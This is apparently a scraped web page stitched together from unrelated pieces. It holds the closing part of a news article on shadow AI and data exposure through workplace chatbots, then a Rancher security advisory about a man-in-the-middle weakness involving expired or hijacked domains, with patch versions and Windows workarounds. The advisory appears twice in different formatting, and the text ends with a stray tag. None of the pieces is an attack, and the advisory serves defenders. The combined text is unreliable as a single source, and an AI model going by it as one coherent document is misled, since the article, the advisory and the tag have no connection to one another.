"This statistic suggests that many organizations may underestimate the importance of training, perhaps due to budget constraints, or a lack of understanding about the potential risks," Plaggemier says. And meanwhile, she adds, "This data underscores the gap between recognizing potential dangers and having the knowledge to mitigate them. Employees may understand that risks exist, but the lack of proper education leaves them vulnerable to the severity of these threats, especially in environments where productivity often takes precedence over security."

Worse, this knowledge gap contributes to the rise of "shadow AI," where unapproved tools are used outside the organization's security framework.

"As employees prioritize efficiency, they may adopt these tools without fully grasping the long-term consequences for data security and compliance, leaving organizations vulnerable to significant risks," Plaggemier warns.

**It's Time for Enterprises to Implement GenAI Best Practices**

It's clear that prioritizing immediate business needs over long-term security strategies can leave companies vulnerable. But when it comes to rolling out AI before security is ready, the golden allure of all those productivity enhancements — sanctioned or not — may often prove too strong to resist.

"As AI systems become more common, it's essential for organizations to view training not just as a compliance requirement but as a vital investment in protecting their data and brand integrity," Plaggemier says. "To effectively reduce risk exposure, companies should implement clear guidelines around the use of GenAI tools, including what types of information can and cannot be shared."

Morgan Wright, chief security adviser at SentinelOne, advocates starting the guidelines-development process with first principles: "The biggest risk is not defining what problem you're solving through chatbots," he notes. "Understanding what is to be solved helps create the right policies and operational guardrails to protect privacy and intellectual property. It's emblematic of the old saying, 'When all you have is a hammer, all the world is a nail.'"

There are also technology steps that organizations should take to shore up AI risks.

"Establishing strict access controls and monitoring the use of these tools can also help mitigate risks," Plaggemier adds. "Implementing data masking techniques can protect sensitive information from being input into GenAI platforms. Regular audits and the use of AI monitoring tools can also ensure compliance and detect any unauthorized attempts to access sensitive data."

There are other ideas out there, too. "Some companies have restricted the amount of data input into a query (like 1,024 characters)," Wright says. "It could also involve segmenting off parts of the organization dealing with sensitive data. But for now, there is no clear solution or approach that can solve this thorny issue to everyone's satisfaction."

The danger to companies can also be exacerbated thanks to GenAI capabilities being added to third-party software-as-a-solution (SaaS) applications, Wing's Sharon warns — this is an area that is too often overlooked.

"As new capabilities are added, even to very reputable SaaS applications, the terms and conditions of those applications is often updated, and 99% of users don't pay attention to those terms," she explains. "It is not unusual for applications to set as the default that they can use data to train their AI models."

She notes that an emerging category of SaaS security tools called SaaS Security Posture Management (SSPM) is developing ways to monitor which applications use AI and even monitor changes to things like terms and conditions.

"Tools like this are helpful for IT teams to assess risks and make changes in policy or even access on a continuous basis," she says.

**About the Author**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

Shadow AI, Data Exposure Plague Workplace Chatbot Use

### Impact
A vulnerability has been identified within Rancher that can be exploited in narrow circumstances through a man-in-the-middle (MITM) attack. An attacker would need to have control of an expired domain or execute a DNS spoofing/hijacking attack against the domain to exploit this vulnerability. The targeted domain is the one used as the Rancher URL.

SUSE is unaware of any successful exploitation of this vulnerability, which has a high complexity bar. 

Please consult the associated  [MITRE ATT&CK - Technique - Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557/) for further information about this attack category.

### Patches
A new setting, [`agent-tls-mode`](https://ranchermanager.docs.rancher.com/getting-started/installation-and-upgrade/installation-references/tls-settings), was added, which allows users to specify if agents will use `strict` certificate verification when connecting to Rancher. The field can be set to `strict` (which requires the agent to verify the certificate using only the Certificate Authority in the `cacerts` setting) or `system-store` (which allows the agent to verify the certificate using any Certificate Authority in the operating system's trust store). This setting will default to strict on new installs of Rancher `v2.8.6`, `v2.9.0`, and newer versions. When upgrading from a prior version, the current value will be kept. If updating from older versions, the settings must be manually configured.

**Important:** For non-Windows nodes, this is fixed since `v2.8.6` and `v2.9.0`. For Windows nodes, this is fully fixed starting with `v2.8.8` and `v2.9.2`

Patched versions include releases `v2.8.8` and `v2.9.2`.

For non-Windows nodes, the fix was released with `v2.7.15`. However, if you are running Rancher `v2.7.x` and have Windows nodes, you must follow the below workaround to address this issue on those nodes.

### Workarounds
If you can't update, please follow the standard security practices including:
 
1. Properly control the expiration and ownership of the domain used as the Rancher URL (the `server-url` of the Rancher cluster).
2. Enabling DNSSEC as a way to protect against DNS spoofing or hijacking attacks. 
3. Properly clean up and decommission unused clusters and downstream clusters, instead of leaving them behind. For example, downstream clusters which are alive while the main Rancher server is no longer available.

In some cases, Windows nodes added to RKE2 clusters may not be automatically updated with the desired `agent-tls-mode`. Windows clusters running at least the August patches (`v1.27.16`, `v1.28.13`, `v1.29.8`, `v1.30.4`) will be automatically updated. For Windows nodes running older versions of RKE2, this issue can be manually resolved by following these [instructions](https://github.com/rancherlabs/support-tools/tree/master/windows-agent-strict-verify).

If you are running Rancher `v2.7.x` Windows nodes will not automatically update, and you must follow the above [instructions](https://github.com/rancherlabs/support-tools/tree/master/windows-agent-strict-verify), with the following notes:
1. This needs to be done for all existing Windows nodes and any new nodes provisioned.
2. You must omit the `DownloadWins` flag, and must instead manually download the `rancher-wins` version [0.4.18](https://github.com/rancher/wins/releases/tag/v0.4.18), or greater, from its GitHub repository and place it in the required directories:
a. `c:\Windows`
b. `c:\user\local\bin`
3. You must restart the nodes after running the script, simply restarting `rancher-wins` or RKE2 will result in [pod networking errors](https://github.com/rancher/rke2/issues/5551). The only scenario where you do not need to completely restart the node is if the cluster is running version `v1.27.16` or higher.

### Credits
This issue was found and reported by Jarkko Vesiluoma from Redtest Security.

### For more information
If you have any questions or comments about this advisory:
- Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries.
- Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.
- Verify with our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).


**Impact**

A vulnerability has been identified within Rancher that can be exploited in narrow circumstances through a man-in-the-middle (MITM) attack. An attacker would need to have control of an expired domain or execute a DNS spoofing/hijacking attack against the domain to exploit this vulnerability. The targeted domain is the one used as the Rancher URL.

SUSE is unaware of any successful exploitation of this vulnerability, which has a high complexity bar.

Please consult the associated MITRE ATT&CK - Technique - Adversary-in-the-Middle for further information about this attack category.

**Patches**

A new setting, agent-tls-mode, was added, which allows users to specify if agents will use strict certificate verification when connecting to Rancher. The field can be set to strict (which requires the agent to verify the certificate using only the Certificate Authority in the cacerts setting) or system-store (which allows the agent to verify the certificate using any Certificate Authority in the operating system's trust store). This setting will default to strict on new installs of Rancher v2.8.6, v2.9.0, and newer versions. When upgrading from a prior version, the current value will be kept. If updating from older versions, the settings must be manually configured.

**Important:** For non-Windows nodes, this is fixed since v2.8.6 and v2.9.0. For Windows nodes, this is fully fixed starting with v2.8.8 and v2.9.2

Patched versions include releases v2.8.8 and v2.9.2.

For non-Windows nodes, the fix was released with v2.7.15. However, if you are running Rancher v2.7.x and have Windows nodes, you must follow the below workaround to address this issue on those nodes.

**Workarounds**

If you can't update, please follow the standard security practices including:

1.  Properly control the expiration and ownership of the domain used as the Rancher URL (the server-url of the Rancher cluster).
2.  Enabling DNSSEC as a way to protect against DNS spoofing or hijacking attacks.
3.  Properly clean up and decommission unused clusters and downstream clusters, instead of leaving them behind. For example, downstream clusters which are alive while the main Rancher server is no longer available.

In some cases, Windows nodes added to RKE2 clusters may not be automatically updated with the desired agent-tls-mode. Windows clusters running at least the August patches (v1.27.16, v1.28.13, v1.29.8, v1.30.4) will be automatically updated. For Windows nodes running older versions of RKE2, this issue can be manually resolved by following these instructions.

If you are running Rancher v2.7.x Windows nodes will not automatically update, and you must follow the above instructions, with the following notes:

1.  This needs to be done for all existing Windows nodes and any new nodes provisioned.
2.  You must omit the DownloadWins flag, and must instead manually download the rancher-wins version 0.4.18, or greater, from its GitHub repository and place it in the required directories:  
    a. c:\Windows  
    b. c:\user\local\bin
3.  You must restart the nodes after running the script, simply restarting rancher-wins or RKE2 will result in pod networking errors. The only scenario where you do not need to completely restart the node is if the cluster is running version v1.27.16 or higher.

**Credits**

This issue was found and reported by Jarkko Vesiluoma from Redtest Security.

**For more information**

If you have any questions or comments about this advisory:

*   Reach out to the SUSE Rancher Security team for security related inquiries.
*   Open an issue in the Rancher repository.
*   Verify with our support matrix and product support lifecycle.

**References**

*   GHSA-h4h5-9833-v2p4
*   https://github.com/rancherlabs/support-tools/tree/master/windows-agent-strict-verify
*   https://ranchermanager.docs.rancher.com/getting-started/installation-and-upgrade/installation-references/tls-settings

Tag

#acer